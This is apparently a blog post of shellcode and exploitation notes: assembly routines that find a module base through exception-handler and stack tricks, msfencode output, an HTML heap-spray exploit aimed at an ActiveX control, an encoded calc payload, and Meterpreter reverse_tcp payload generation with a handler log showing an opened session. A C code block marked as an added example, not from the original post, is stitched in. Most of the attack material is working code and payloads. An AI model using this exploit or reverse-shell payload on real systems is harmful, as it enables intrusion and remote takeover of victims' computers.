    0040D4BC      AD            lods dword ptr ds:[esi]           ;  eax = 0xffffffff, esi now points at the Handler field
    0040D4BD      AD            lods dword ptr ds:[esi]           ;  eax = handler address
    0040D4BE      48            dec eax
    0040D4BF      66:33C0       xor ax,ax                         ;  step back to the previous 64 KB boundary
    0040D4C2      66:8138 4D5A  cmp word ptr ds:[eax],0x5A4D      ;  "MZ"?
    0040D4C7    ^ 75 F5         jnz Xtest1231.0040D4BE            ;  eax = base of the module containing the handler (ntdll.dll here)
    0040D4C9      59            pop ecx
    0040D4CA      5E            pop esi
    0040D4CB      C3            retn
    

    56 51 33 C9 64 8B 31 AD 96 39 0E 79 FA AD AD 48 66 33 C0 66 81 38 4D 5A 75 F5 59 5E C3

    3) TOPSTACK TEB

    Works on XP SP3, not on Win7 ~~~~~

    0044F611 >    56            push esi
    0044F612      33F6          xor esi,esi
    0044F614      64:8B46 04    mov eax,dword ptr fs:[esi+0x4]           ;  NtTib.StackBase
    0044F618      8B40 E4       mov eax,dword ptr ds:[eax-0x1C]          ;  Handler of the top-level registration record
    0044F61B      48            dec eax                                  ;  kernel32._except_handler3, installed by the SE handler prolog
    0044F61C      66:33C0       xor ax,ax                                ;  step back to the previous 64 KB boundary
    0044F61F      66:8138 4D5A  cmp word ptr ds:[eax],0x5A4D             ;  "MZ"?
    0044F624    ^ 75 F5         jnz X表白专用.0044F61B
    0044F626      5E            pop esi
    0044F627      C3            retn

    56 33 F6 64 8B 46 04 8B 40 E4 48 66 33 C0 66 81 38 4D 5A 75 F5 5E C3

    Explanation: the top-level exception registration record always sits 0x20 below the highest address of the thread stack, so its Handler field is at StackBase - 0x1C.




    Unicode encoding ~~~~~~:

    root@bt:/opt/framework/msf3# ./msfencode -i /root/Desktop/1.dat  -c 1 -b '\x00' -e x86/shikata_ga_nai -t js_le
    [*] x86/shikata_ga_nai succeeded with size 195 (iteration=1)
    
    %uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6
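Added example, not from the original post: how the `-t js_le` output above maps onto bytes. `unescape("%uc3d9")` yields the UTF-16 code unit 0xC3D9, which the browser stores little-endian as D9 C3, so the first six bytes of the stub above (D9 C3 D9 74 24 F4: an FPU instruction followed by the fstenv from the earlier listing) come out as %uc3d9%u74d9%uf424. The padding byte used for an odd trailing byte (0x90) and the function names are this example's assumptions; msfencode's own handling of odd lengths is not shown on the page.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* bytes -> "%uXXXX%uXXXX..." in js_le layout: each escape is one 16-bit code
 * unit, written high byte first in the text but stored low byte first in
 * memory. An odd trailing byte is padded with 0x90 (this example's choice).
 * Returns the number of characters written, or 0 if out is too small. */
size_t bytes_to_js_le(const uint8_t *in, size_t n, char *out, size_t outsz) {
    size_t pos = 0;
    if (outsz == 0) return 0;
    for (size_t i = 0; i < n; i += 2) {
        uint8_t lo = in[i];
        uint8_t hi = (i + 1 < n) ? in[i + 1] : 0x90;
        if (pos + 7 > outsz) return 0;               /* room for "%uXXXX" + NUL */
        pos += (size_t)snprintf(out + pos, outsz - pos, "%%u%02x%02x", hi, lo);
    }
    out[pos] = '\0';
    return pos;
}

/* "%uXXXX..." -> bytes in memory order. Returns bytes written, 0 on malformed input. */
size_t js_le_to_bytes(const char *in, uint8_t *out, size_t outsz) {
    size_t n = 0;
    while (*in) {
        unsigned v;
        if (in[0] != '%' || in[1] != 'u' || n + 2 > outsz) return 0;
        for (int k = 2; k < 6; k++)
            if (!isxdigit((unsigned char)in[k])) return 0;   /* exactly four hex digits */
        if (sscanf(in + 2, "%4x", &v) != 1) return 0;
        out[n++] = (uint8_t)(v & 0xff);              /* low byte first in memory */
        out[n++] = (uint8_t)(v >> 8);
        in += 6;
    }
    return n;
}

/* First six bytes of the stub in the listing above, constructed from that
 * listing: fld st(3) followed by fstenv [esp-0xC]. */
static const uint8_t STUB_HEAD[6] = { 0xd9, 0xc3, 0xd9, 0x74, 0x24, 0xf4 };

const char *demo_js_le(void) {
    static char out[64];
    bytes_to_js_le(STUB_HEAD, sizeof STUB_HEAD, out, sizeof out);
    return out;                 /* "%uc3d9%u74d9%uf424" */
}

const char *demo_js_le_odd(void) {
    static char out[16];
    bytes_to_js_le(STUB_HEAD, 1, out, sizeof out);
    return out;                 /* single byte D9, padded: "%u90d9" */
}

int demo_js_le_roundtrip(void) {
    uint8_t back[8];
    size_t n = js_le_to_bytes(demo_js_le(), back, sizeof back);
    return n == sizeof STUB_HEAD && memcmp(back, STUB_HEAD, n) == 0;
}

int main(void) {
    printf("%s\n%s\nroundtrip: %d\n", demo_js_le(), demo_js_le_odd(), demo_js_le_roundtrip());
    return 0;
}
```

The byte order matters when a bad character has to be avoided: a forbidden byte can hide in either half of a %uXXXX escape, so checks must run over the decoded byte sequence, not over the escape text.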


    This works, and bad characters can be excluded with -b.

    <object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>  
    <script>  
    var nop = unescape("%u9090");  
    var shellcode=unescape("%uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6")
    while (nop.length < 0x100000/2)   
    {nop += nop;}  
      
    nop=nop.substring(0,0x100000-32/2-4/2-2/2-1-shellcode.length);  
    nop =nop+ shellcode;  
      var memory = new Array();  
      for (var i=0;i<200;i++)   
    {memory[i] += nop;}  
    
    arg1='\x0a';
    while(arg1.length < 2000){arg1 += '\x0c';}
    arg2 = '\x0c\x0c\x0c\x0c';
    arg1 = arg1 + arg2;
    target.Data = arg1;
    </script>  


    Generating Unicode shellcode with msfencode

    root@bt:/opt/framework/msf3# ./msfpayload windows/exec  CMD=calc R |
    > ./msfencode -e x86/alpha_mixed -t raw | 
    > ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
    [*] x86/alpha_mixed succeeded with size 454 (iteration=1)
    
    [*] x86/unicode_upper succeeded with size 1039 (iteration=1)
    
    my $buf = 
    "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
    "\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
    "\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
    "\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
    "\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" .
    "\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" .
    "\x51\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31\x31" .
    "\x31\x41\x49\x41\x4a\x51\x49\x31\x41\x59\x41\x5a\x42\x41" .
    "\x42\x41\x42\x41\x42\x41\x42\x33\x30\x41\x50\x42\x39\x34" .
    "\x34\x4a\x42\x54\x49\x4b\x31\x49\x4b\x58\x4e\x49\x49\x52" .
    "\x51\x5a\x54\x51\x4e\x50\x56\x52\x39\x50\x49\x50\x49\x51" .
    "\x39\x50\x49\x51\x39\x51\x39\x50\x49\x51\x39\x50\x49\x50" .
    "\x49\x51\x33\x51\x33\x50\x43\x50\x43\x50\x43\x50\x43\x50" .
    "\x37\x52\x31\x51\x4a\x51\x5a\x51\x31\x50\x58\x50\x50\x50" .
    "\x30\x51\x31\x50\x30\x51\x31\x52\x4b\x51\x31\x51\x31\x50" .
    "\x51\x50\x32\x51\x31\x50\x42\x50\x32\x51\x32\x51\x32\x50" .
    "\x30\x51\x32\x50\x42\x51\x31\x51\x32\x50\x58\x52\x30\x50" .
    "\x38\x51\x31\x50\x42\x54\x35\x50\x4a\x51\x39\x50\x49\x52" .
    "\x4c\x50\x4b\x51\x48\x50\x4e\x43\x39\x50\x43\x50\x30\x50" .
    "\x45\x52\x30\x51\x37\x54\x30\x51\x33\x50\x50\x50\x4d\x50" .
    "\x59\x50\x49\x43\x45\x51\x46\x52\x31\x52\x38\x51\x42\x51" .
    "\x33\x50\x54\x50\x4c\x50\x4b\x50\x52\x43\x42\x52\x36\x50" .
    "\x50\x50\x4c\x50\x4b\x51\x33\x51\x52\x50\x54\x50\x4c\x50" .
    "\x4e\x52\x4b\x50\x52\x52\x52\x51\x46\x43\x44\x50\x4c\x50" .
    "\x4b\x51\x44\x50\x32\x50\x45\x43\x48\x50\x56\x52\x4f\x50" .
    "\x4d\x43\x37\x50\x52\x52\x4a\x50\x56\x50\x46\x51\x46\x50" .
    "\x51\x51\x39\x52\x4f\x50\x50\x50\x31\x51\x39\x52\x30\x50" .
    "\x4e\x50\x4c\x51\x37\x50\x4c\x50\x50\x51\x51\x50\x51\x52" .
    "\x4c\x51\x37\x52\x52\x50\x56\x50\x4c\x50\x45\x52\x50\x51" .
    "\x39\x52\x31\x52\x38\x50\x4f\x50\x56\x52\x4d\x50\x45\x50" .
    "\x51\x50\x49\x51\x47\x51\x39\x43\x42\x50\x4c\x50\x30\x51" .
    "\x42\x52\x52\x50\x43\x52\x47\x50\x4e\x52\x4b\x50\x51\x51" .
    "\x32\x52\x32\x50\x30\x50\x4e\x52\x4b\x50\x43\x43\x42\x50" .
    "\x45\x52\x4c\x50\x56\x51\x51\x51\x4a\x52\x50\x50\x4c\x50" .
    "\x4b\x50\x51\x52\x30\x52\x32\x51\x48\x50\x4c\x50\x45\x50" .
    "\x4b\x52\x50\x50\x52\x52\x34\x52\x30\x50\x4a\x50\x45\x52" .
    "\x31\x52\x38\x52\x30\x52\x30\x50\x50\x50\x4c\x50\x4b\x51" .
    "\x33\x54\x38\x50\x47\x52\x48\x50\x4c\x50\x4b\x50\x43\x43" .
    "\x38\x50\x45\x54\x30\x52\x36\x51\x51\x50\x49\x50\x43\x50" .
    "\x4d\x50\x33\x51\x37\x50\x4c\x52\x31\x51\x49\x50\x4e\x52" .
    "\x4b\x52\x36\x52\x34\x50\x4e\x52\x4b\x50\x45\x52\x31\x52" .
    "\x38\x51\x46\x50\x45\x51\x51\x50\x4b\x50\x4f\x52\x34\x52" .
    "\x51\x50\x4f\x50\x30\x50\x4e\x50\x4c\x50\x4f\x50\x31\x50" .
    "\x58\x50\x4f\x52\x36\x52\x4d\x51\x33\x50\x31\x50\x4f\x50" .
    "\x37\x50\x50\x50\x38\x50\x4d\x50\x30\x50\x43\x51\x35\x51" .
    "\x48\x54\x34\x51\x44\x50\x43\x50\x43\x50\x4d\x51\x4a\x50" .
    "\x58\x50\x47\x50\x4b\x50\x51\x52\x4d\x52\x31\x50\x34\x50" .
    "\x54\x50\x35\x50\x58\x52\x42\x50\x50\x52\x38\x50\x4e\x52" .
    "\x4b\x50\x56\x50\x38\x51\x35\x54\x34\x51\x35\x50\x51\x51" .
    "\x48\x50\x53\x52\x30\x43\x36\x50\x4c\x50\x4b\x51\x46\x52" .
    "\x4c\x52\x32\x52\x4b\x50\x4e\x52\x4b\x50\x50\x52\x38\x51" .
    "\x35\x50\x4c\x51\x37\x52\x51\x50\x49\x50\x43\x50\x4c\x50" .
    "\x4b\x50\x47\x54\x34\x50\x4e\x52\x4b\x51\x37\x54\x31\x50" .
    "\x4e\x50\x30\x50\x4e\x43\x39\x50\x52\x52\x44\x51\x37\x51" .
    "\x44\x50\x51\x50\x34\x50\x51\x50\x4b\x52\x31\x50\x4b\x50" .
    "\x45\x50\x31\x50\x50\x50\x59\x51\x33\x51\x5a\x52\x32\x52" .
    "\x51\x51\x39\x52\x4f\x50\x4b\x50\x50\x52\x30\x51\x48\x51" .
    "\x33\x52\x4f\x51\x42\x52\x5a\x50\x4c\x50\x4b\x50\x45\x50" .
    "\x42\x50\x5a\x50\x4b\x50\x4d\x52\x36\x50\x51\x50\x4d\x51" .
    "\x33\x50\x5a\x50\x47\x52\x51\x50\x4e\x52\x4d\x50\x4f\x52" .
    "\x55\x50\x4e\x51\x49\x51\x33\x50\x30\x51\x37\x54\x30\x51" .
    "\x33\x50\x30\x52\x30\x50\x50\x50\x51\x43\x48\x50\x50\x50" .
    "\x31\x50\x4e\x52\x4b\x50\x50\x52\x4f\x50\x4f\x43\x47\x50" .
    "\x4b\x50\x4f\x50\x58\x52\x35\x50\x4d\x52\x4b\x50\x4c\x50" .
    "\x30\x50\x4e\x51\x45\x50\x4f\x52\x32\x50\x51\x50\x46\x50" .
    "\x43\x51\x48\x50\x4f\x51\x46\x50\x5a\x50\x35\x50\x4d\x52" .
    "\x4d\x50\x4d\x50\x4d\x50\x4b\x50\x4f\x50\x4b\x43\x35\x50" .
    "\x47\x50\x4c\x51\x37\x54\x36\x50\x43\x50\x4c\x50\x54\x50" .
    "\x4a\x50\x4f\x52\x50\x51\x39\x52\x4b\x50\x4b\x52\x30\x51" .
    "\x33\x50\x45\x50\x47\x52\x55\x50\x4f\x50\x4b\x50\x43\x54" .
    "\x37\x50\x54\x52\x33\x51\x44\x50\x32\x50\x50\x52\x4f\x51" .
    "\x42\x50\x4a\x50\x43\x50\x30\x52\x30\x51\x43\x50\x49\x52" .
    "\x4f\x50\x58\x51\x45\x51\x35\x50\x33\x52\x31\x54\x31\x50" .
    "\x50\x52\x4c\x50\x45\x50\x33\x51\x33\x50\x30\x51\x31\x51" .
    "\x31\x41\x41";
    


    Meterpreter usage:

    root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.198.135 R | ./msfencode -b '\x00' -t perl -e x86/alpha_mixed
    [*] x86/alpha_mixed succeeded with size 642 (iteration=1)
    
    my $buf = 
    "\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
    "\x42\x75\x4a\x49\x49\x6c\x4b\x58\x4e\x69\x45\x50\x43\x30" .
    "\x47\x70\x43\x50\x4c\x49\x5a\x45\x50\x31\x4e\x32\x50\x64" .
    "\x4e\x6b\x51\x42\x50\x30\x4e\x6b\x50\x52\x56\x6c\x4c\x4b" .
    ...

    The IP and port are those of the listening machine. Run the shellcode on the target machine; the listener then receives the Meterpreter session.

    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf  exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf  exploit(handler) > set LHOST 192.168.198.135
    LHOST => 192.168.198.135
    msf  exploit(handler) > show options 
    
    Module options (exploit/multi/handler):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, process, none
       LHOST     192.168.198.135  yes       The listen address
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Wildcard Target
    
    
    msf  exploit(handler) > exploit 
    
    [*] Started reverse handler on 192.168.198.135:4444 
    [*] Starting the payload handler...
    [*] Sending stage (752128 bytes) to 192.168.198.136
    [*] Meterpreter session 1 opened (192.168.198.135:4444 -> 192.168.198.136:3961) at 2014-06-02 23:09:44 +0800
    
    meterpreter > 
    















  • Original URL: https://www.cnblogs.com/zcc1414/p/3982391.html